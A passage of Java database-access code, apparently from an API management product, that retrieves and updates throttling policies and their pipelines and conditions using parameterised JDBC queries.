* * @param policyName name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicy(String policyName) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, policyName); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Get a particular Global level policy given UUID. * * @param uuid name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicyByUUID(String uuid) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY_BY_UUID; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, uuid); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while retrieving global policy by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Retrieves {@link APIPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * <p>This will retrieve complete details about the APIPolicy with all pipelins and conditions.</p> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicy(String policyName, int tenantId) throws 
APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link APIPolicy} with name <code>uuid</code> * <p>This will retrieve complete details about the APIPolicy with all pipelines and conditions.</p> * * @param uuid uuid of the policy to retrieve from the database * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicyByUUID(String uuid) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicy(String policyName, int tenantId) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new 
ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>uuid</code> * * @param uuid uuid of the policy to retrieve from the database * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicyByUUID(String uuid) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicy(String policyName, int tenantId) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + policyName + '-' + tenantId, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return 
policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>uuid</code> * * @param uuid name of the policy to retrieve from the database * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicyByUUID(String uuid) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + uuid, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves list of pipelines for the policy with policy Id: <code>policyId</code> * * @param policyId policy id of the pipelines * @return list of pipelines * @throws APIManagementException */ private ArrayList<Pipeline> getPipelines(int policyId) throws APIManagementException { Connection connection = null; PreparedStatement pipelinesStatement = null; ResultSet resultSet = null; ArrayList<Pipeline> pipelines = new ArrayList<Pipeline>(); try { connection = APIMgtDBUtil.getConnection(); pipelinesStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_PIPELINES_SQL); int unitTime = 0; int quota = 0; int pipelineId = -1; String timeUnit = null; String quotaUnit = null; String description; pipelinesStatement.setInt(1, policyId); resultSet = pipelinesStatement.executeQuery(); while (resultSet.next()) { Pipeline pipeline = new Pipeline(); ArrayList<Condition> conditions = null; QuotaPolicy quotaPolicy = new QuotaPolicy(); quotaPolicy.setType(resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); timeUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_TIME_UNIT); quotaUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_UNIT); unitTime = resultSet.getInt(ThrottlePolicyConstants.COLUMN_UNIT_TIME); quota = resultSet.getInt(ThrottlePolicyConstants.COLUMN_QUOTA); pipelineId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_CONDITION_ID); description = resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(quotaPolicy.getType())) { RequestCountLimit requestCountLimit = new RequestCountLimit(); 
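                    // Request count quota: the QUOTA column holds the number of requests allowed per unit time.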
requestCountLimit.setUnitTime(unitTime); requestCountLimit.setTimeUnit(timeUnit); requestCountLimit.setRequestCount(quota); quotaPolicy.setLimit(requestCountLimit); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(quotaPolicy.getType())) { BandwidthLimit bandwidthLimit = new BandwidthLimit(); bandwidthLimit.setUnitTime(unitTime); bandwidthLimit.setTimeUnit(timeUnit); bandwidthLimit.setDataUnit(quotaUnit); bandwidthLimit.setDataAmount(quota); quotaPolicy.setLimit(bandwidthLimit); } conditions = getConditions(pipelineId); pipeline.setConditions(conditions); pipeline.setQuotaPolicy(quotaPolicy); pipeline.setId(pipelineId); pipeline.setDescription(description); pipelines.add(pipeline); } } catch (SQLException e) { handleException("Failed to get pipelines for policyId: " + policyId, e); } finally { APIMgtDBUtil.closeAllConnections(pipelinesStatement, connection, resultSet); } return pipelines; } /** * Retrieves list of Conditions for a pipeline specified by <code>pipelineId</code> * * @param pipelineId pipeline Id with conditions to retrieve * @return list of Conditions for a pipeline * @throws APIManagementException */ private ArrayList<Condition> getConditions(int pipelineId) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; ArrayList<Condition> conditions = new ArrayList<Condition>(); String startingIP = null; String endingIP = null; String specificIP = null; boolean invert; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_IP_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { startingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_STARTING_IP); endingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_ENDING_IP); specificIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_SPECIFIC_IP); invert = resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_WITHIN_IP_RANGE); if (specificIP != null && !"".equals(specificIP)) { IPCondition ipCondition = new IPCondition(PolicyConstants.IP_SPECIFIC_TYPE); ipCondition.setSpecificIP(specificIP); ipCondition.setInvertCondition(invert); conditions.add(ipCondition); } else if (startingIP != null && !"".equals(startingIP)) { /* Assumes availability of starting ip means ip range is enforced. Therefore availability of ending ip is not checked. 
*/ IPCondition ipRangeCondition = new IPCondition(PolicyConstants.IP_RANGE_TYPE); ipRangeCondition.setStartingIP(startingIP); ipRangeCondition.setEndingIP(endingIP); ipRangeCondition.setInvertCondition(invert); conditions.add(ipRangeCondition); } } setHeaderConditions(pipelineId, conditions); setQueryParameterConditions(pipelineId, conditions); setJWTClaimConditions(pipelineId, conditions); } catch (SQLException e) { handleException("Failed to get conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } return conditions; } /** * Add Header conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setHeaderConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_HEADER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { HeaderCondition headerCondition = new HeaderCondition(); headerCondition.setHeader(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_NAME)); headerCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_VALUE)); headerCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_HEADER_FIELD_MAPPING)); conditions.add(headerCondition); } } catch (SQLException e) { handleException("Failed to get header conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add Query parameter conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setQueryParameterConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_QUERY_PARAMETER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { QueryParameterCondition queryParameterCondition = new QueryParameterCondition(); queryParameterCondition .setParameter(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_NAME)); queryParameterCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_VALUE)); queryParameterCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_PARAM_MAPPING)); conditions.add(queryParameterCondition); } } catch (SQLException e) { handleException("Failed to get query parameter conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add JWT claim conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the 
pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setJWTClaimConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_JWT_CLAIM_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { JWTClaimsCondition jwtClaimsCondition = new JWTClaimsCondition(); jwtClaimsCondition.setClaimUrl(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_URI)); jwtClaimsCondition.setAttribute(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_ATTRIBUTE)); jwtClaimsCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_CLAIM_MAPPING)); conditions.add(jwtClaimsCondition); } } catch (SQLException e) { handleException("Failed to get jwt claim conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Updates API level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * <p> * Exsisting policy will be deleted and new policy will be inserted to the database * with old POLICY_ID. Uses {@link #updateAPIPolicy(APIPolicy)} * to create new policy. * </p> * * @param policy updated policy object * @throws APIManagementException */ public APIPolicy updateAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement selectStatement = null; PreparedStatement deleteStatement = null; ResultSet resultSet = null; int oldPolicyId = 0; String oldPolicyUUID = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (policy != null) { if (policy.getPolicyName() != null && policy.getTenantId() != -1) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_SQL); selectStatement.setString(1, policy.getPolicyName()); selectStatement.setInt(2, policy.getTenantId()); } else if (policy.getUUID() != null) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_BY_UUID_SQL); selectStatement.setString(1, policy.getUUID()); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. 
Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } } else { String errorMsg = "Provided Policy to add is null"; log.error(errorMsg); throw new APIManagementException(errorMsg); } // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { oldPolicyId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID); oldPolicyUUID = resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID); } deleteStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL); deleteStatement.setInt(1, policy.getTenantId()); deleteStatement.setString(2, policy.getPolicyName()); deleteStatement.executeUpdate(); policy.setPolicyId(oldPolicyId); if (!StringUtils.isBlank(oldPolicyUUID)) { policy.setUUID(oldPolicyUUID); } updateAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to update api policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); } return policy; } /** * Updates Application level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; if (policy.getTenantId() == -1 || StringUtils.isEmpty(policy.getPolicyName())) { String errorMsg = "Policy object doesn't contain mandatory parameters. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId(); log.error(errorMsg); throw new APIManagementException(errorMsg); } try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. 
Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); if (hasCustomAttrib) { updateStatement.setBlob(8, new ByteArrayInputStream(policy.getCustomAttributes())); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(9, policy.getPolicyName()); updateStatement.setInt(10, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(9, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(8, policy.getPolicyName()); updateStatement.setInt(9, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(8, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Application Policy: " + policy.toString(), ex); } } handleException( "Failed to update application policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates Subscription level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. 
At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); updateStatement.setInt(8, policy.getRateLimitCount()); updateStatement.setString(9, policy.getRateLimitTimeUnit()); updateStatement.setBoolean(10, policy.isStopOnQuotaReach()); updateStatement.setString(11, policy.getBillingPlan()); if (hasCustomAttrib) { long lengthOfStream = policy.getCustomAttributes().length; updateStatement.setBinaryStream(12, new ByteArrayInputStream(policy.getCustomAttributes()), lengthOfStream); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(13, policy.getPolicyName()); updateStatement.setInt(14, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(13, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(12, policy.getPolicyName()); updateStatement.setInt(13, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(12, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. 
Exception will be thrown later for upper exception log.error("Failed to rollback the update Subscription Policy: " + policy.toString(), ex); } } handleException( "Failed to update subscription policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates global throttle policy in database * * @param policy updated policy obejct * @throws APIManagementException */ public void updateGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; InputStream siddhiQueryInputStream; try { byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_SQL); } else if (!StringUtils.isBlank(policy.getUUID())) { 